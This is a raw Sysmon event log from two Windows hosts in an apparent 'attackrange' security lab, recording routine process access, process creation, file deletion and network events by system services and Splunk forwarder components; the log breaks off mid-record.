07:57:35.622{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082676Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.622{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082675Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.622{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B3EF-615A-7701-00000000FD01}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082674Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.622{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B3EF-615A-7701-00000000FD01}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082673Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.623{2FDD8D40-B3EF-615A-7701-00000000FD01}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082672Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:35.216{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB0BC1D3384C1E1C2D37A041DDB4B283,SHA256=732BDE72E2795F18765D4ADA9A301F62873F67EDA76A31B359F5F597FF1413E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104782Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:36.941{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=390A4E1602646368ACC89986C0E1D222,SHA256=7428C945B072F78733C842D95D02B1AF9D4174D57651BBB5D85406E4DFCF8CC1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082703Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.690{2FDD8D40-B3F0-615A-7801-00000000FD01}24082128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082702Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.487{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B3F0-615A-7801-00000000FD01}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082701Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.487{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082700Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.487{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082699Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.487{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082698Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.487{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082697Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.487{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082696Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.487{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082695Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.487{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082694Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.487{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082693Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.487{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082692Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.487{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B3F0-615A-7801-00000000FD01}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082691Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.487{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B3F0-615A-7801-00000000FD01}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082690Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.487{2FDD8D40-B3F0-615A-7801-00000000FD01}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082689Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:36.221{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2214566DC95F7DADF1526326209013FB,SHA256=F34E9304012149B9EE89449AEDC41C9A3643B83969463041576465E83E5A6AC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104783Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:37.957{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD90BFC9E2FD4EBB994208C694071D70,SHA256=7D7032D10A5AC8A26F1C2012E4F27D3F32100CA1315370B6073304A8F56AD4A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082705Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:37.487{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD907B6E868DB1B56CB839DFE7F6490B,SHA256=11583FD08E02B805430156D48FD40D35289995C81960536FF9028B3C88091382,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082704Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:37.330{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11E744FEF375F379666685D44369A0B1,SHA256=7207142FCA535648EABC2858EB8800F3F1D1A3EAD19F999F1FC78DB7993E6976,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104784Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:38.957{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01E86E600454018FEAAE4EB36694B165,SHA256=526B246F29CECF674C67F14A7AFD652BCCD7C75AD8C2D22716E88556A4E9DAD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082706Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:38.565{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FFBFD3ADE6CF86C27187662D3DA4EFE,SHA256=B2D319E4524168BEAB3F583BC29AF32DDB4824DDDEFFEE6CE3D9095182CC0B4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104786Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:39.957{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16CC410CA71E28F3231B65C7076711E0,SHA256=4302877C345BC37A87664C8C4E1E9B992B99F8E2D9F9B5495E040F3122983AF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082707Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:39.612{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=491368A7D86C8A21DF197464E2231BA6,SHA256=60EC065D04F688043655AE33B3A1A0680C5AA94C7530DF9925AB711029828A4C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104785Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:38.413{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51726-false10.0.1.12-8000- 23542300x8000000000000000104787Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:40.988{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=377701B1F0A55A40A9892E40AC37CC1C,SHA256=83B747ED342004A4B5F1C7A0BDFDE1F16E0D15E058817F78C15EC08193EDB5AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082708Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:40.768{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFA64A115F9B9D852605FF2604FFB5D6,SHA256=CDDE3CDFBF2EEB083D2AFB0C4899F303818E32B150588D832299CE8BA83947E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082710Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:41.862{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1C7A5AE69C912BCA26DCFB49D6CAEB1,SHA256=22047DA39768EBCC5F4FA2F1CB659933651EC7FC9043774FF4F5258EB594F9A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104788Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:41.988{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F596195464DD10E8A9F8C2C5FBBA0BE7,SHA256=19EB1F6954528648511E91EB35CA95CE6DA14DC39A4F09BF1075B4E2DE547872,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082709Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 